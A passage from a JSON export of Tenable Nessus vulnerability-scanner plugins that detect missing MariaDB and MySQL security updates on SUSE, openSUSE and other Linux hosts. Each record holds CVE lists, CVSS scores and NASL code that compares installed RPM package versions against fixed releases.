sp:\"1\", reference:\"mariadb-tools-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.22-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:29:55", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 19, "cvss3": {"score": 6.2, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-02-08T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2016-164)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-5969", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-02-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2016-164.NASL", "href": "https://www.tenable.com/plugins/nessus/88615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-164.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88615);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", \"CVE-2015-5969\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2016-164)\");\n script_summary(english:\"Check for the openSUSE-2016-164 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958789\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient-devel-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient_r18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld-devel-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debugsource-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-errormessages-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-06-04T19:09:43", "description": "The version of Oracle MySQL installed on the remote host is 5.5.x\nprior to 5.5.46. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists in the Types subcomponent.\n An authenticated, remote attacker can exploit this to\n gain access to sensitive information. (CVE-2015-4826)\n\n - An unspecified flaw exists in the Security:Privileges\n subcomponent. An authenticated, remote attacker can\n exploit this to impact integrity. (CVE-2015-4830)\n\n - An unspecified flaw exists in the Security:Encryption\n subcomponent. An unauthenticated, remote attacker can\n exploit this to gain access to sensitive information.\n (CVE-2015-7744)\n\n - An unspecified flaw exists in the Options subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-3471)\n\nAdditionally, unspecified denial of service vulnerabilities exist in\nthe following MySQL subcomponents :\n\n - DDL (CVE-2015-4815)\n\n - DML (CVE-2015-4858, CVE-2015-4913)\n\n - InnoDB (CVE-2015-4861)\n\n - Parser (CVE-2015-4870)\n\n - Partition (CVE-2015-4792, CVE-2015-4802)\n\n - SP (CVE-2015-4836)", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"}, "published": "2015-10-29T00:00:00", "title": "Oracle MySQL 5.5.x < 5.5.46 Multiple Vulnerabilities (October 2015 CPU) (January 2016 CPU) (July 2016 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2016-3471", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-7744"], "modified": "2015-10-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:mysql", "cpe:/a:oracle:mysql", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:fermilab:scientific_linux:mysql", "p-cpe:/a:fedoraproject:fedora:mysql", "p-cpe:/a:centos:centos:mysql", "p-cpe:/a:redhat:enterprise_linux:mysql", "p-cpe:/a:amazon:linux:mysql"], "id": "MYSQL_5_5_46_RPM.NASL", "href": "https://www.tenable.com/plugins/nessus/86658", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86658);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/03\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n \"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\",\n \"CVE-2015-7744\",\n \"CVE-2016-3471\"\n );\n script_bugtraq_id(\n 77137,\n 77145,\n 77153,\n 77165,\n 77171,\n 77190,\n 77208,\n 77222,\n 77228,\n 77237,\n 91913\n );\n\n script_name(english:\"Oracle MySQL 5.5.x < 5.5.46 Multiple Vulnerabilities (October 2015 CPU) (January 2016 CPU) (July 2016 CPU)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle MySQL installed on the remote host is 5.5.x\nprior to 5.5.46. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists in the Types subcomponent.\n An authenticated, remote attacker can exploit this to\n gain access to sensitive information. (CVE-2015-4826)\n\n - An unspecified flaw exists in the Security:Privileges\n subcomponent. An authenticated, remote attacker can\n exploit this to impact integrity. (CVE-2015-4830)\n\n - An unspecified flaw exists in the Security:Encryption\n subcomponent. An unauthenticated, remote attacker can\n exploit this to gain access to sensitive information.\n (CVE-2015-7744)\n\n - An unspecified flaw exists in the Options subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-3471)\n\nAdditionally, unspecified denial of service vulnerabilities exist in\nthe following MySQL subcomponents :\n\n - DDL (CVE-2015-4815)\n\n - DML (CVE-2015-4858, CVE-2015-4913)\n\n - InnoDB (CVE-2015-4861)\n\n - Parser (CVE-2015-4870)\n\n - Partition (CVE-2015-4792, CVE-2015-4802)\n\n - SP (CVE-2015-4836)\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368795.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1de82df5\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368796.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?10ceb1c6\");\n # http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3089849.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cde00c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/epmos/faces/DocumentDisplay?id=2048227.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2096144.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2157431.1\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?75a4a4fb\");\n # https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d13bbe45\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?453b5f8c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 5.5.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3471\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\");\n script_require_ports(\"Host/RedHat/release\", \"Host/AmazonLinux/release\", \"Host/SuSE/release\", \"Host/CentOS/release\");\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nfix_version = \"5.5.46\";\nexists_version = \"5.5\";\n\nmysql_check_rpms(mysql_packages:default_mysql_rpm_list_server_only, fix_ver:fix_version, exists_ver:exists_version, rhel_os_list:default_mysql_rhel_os_list, centos_os_list:default_mysql_centos_os_list, suse_os_list:default_mysql_suse_os_list, ala_os_list:default_mysql_ala_os_list, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:26", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - 10.0.21: CVE-2015-4816, CVE-2015-4819, CVE-2015-4879,\n CVE-2015-4895\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2016-01-18T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0121-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-01-18T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2016-0121-1.NASL", "href": "https://www.tenable.com/plugins/nessus/87964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0121-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87964);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4895\", \"CVE-2015-4913\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0121-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - 10.0.21: CVE-2015-4816, CVE-2015-4819, CVE-2015-4879,\n CVE-2015-4895\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958789\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4802/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4807/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4815/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4819/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4826/\"\n );\n script_set_attribute(\n 